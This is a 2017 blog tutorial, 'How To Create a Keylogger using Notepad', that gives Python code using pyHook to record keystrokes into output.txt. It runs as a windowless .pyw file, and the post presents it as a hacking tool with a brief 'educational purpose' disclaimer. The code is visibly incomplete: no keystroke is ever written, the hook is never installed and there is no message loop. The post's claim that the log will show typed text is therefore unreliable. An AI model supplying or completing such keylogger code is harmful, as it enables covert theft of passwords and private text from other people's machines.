Monday, 20 November 2017

How To Create a Keylogger using Notepad

A keylogger is a hacking tool of the newbie but sometimes highly skilled hackers also use them.I already posted an article on the topic that what are the software and hardware keyloggers but now i am going to teach you that how you can create your own keylogger using notepad.if you don't know what are keyloggers and how to use them, i prefer you to read my previous article from the link These are very easy to create and use. So, let’s learn how to create a free keylogger.

How To Create Keylogger Using Notepad?

1. Open notepad and paste the following code in it:

import pyHook, pythoncom, sys, logging

# feel free to set the file_log to a different file name/location

file_log = 'output.txt'

def OnKeyboardEvent(event):

logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')



return True

hooks_manager = pyHook.HookManager()

hooks_manager.KeyDown = OnKeyboardEvent



2. Save the file as keylogger.pyw

3. Fire up your keylogger
Double-click on the file you just created and test it out, then start typing.

When you want to stop logging, open up task manager and kill all the “python” processes. Then look for output.txt in the same directory were the keylogger.pyw is. Open it up and you should see whatever you typed.
You may see some weird looking character if you open it with notepad, those characters means you hit the backspace key.
This tutorial is only for educational purpose. don't harm anyone i will not be responsible of any illegal activity performed by you.
Stay Safe and Enjoy.
Thanks for reading!♥♥♥

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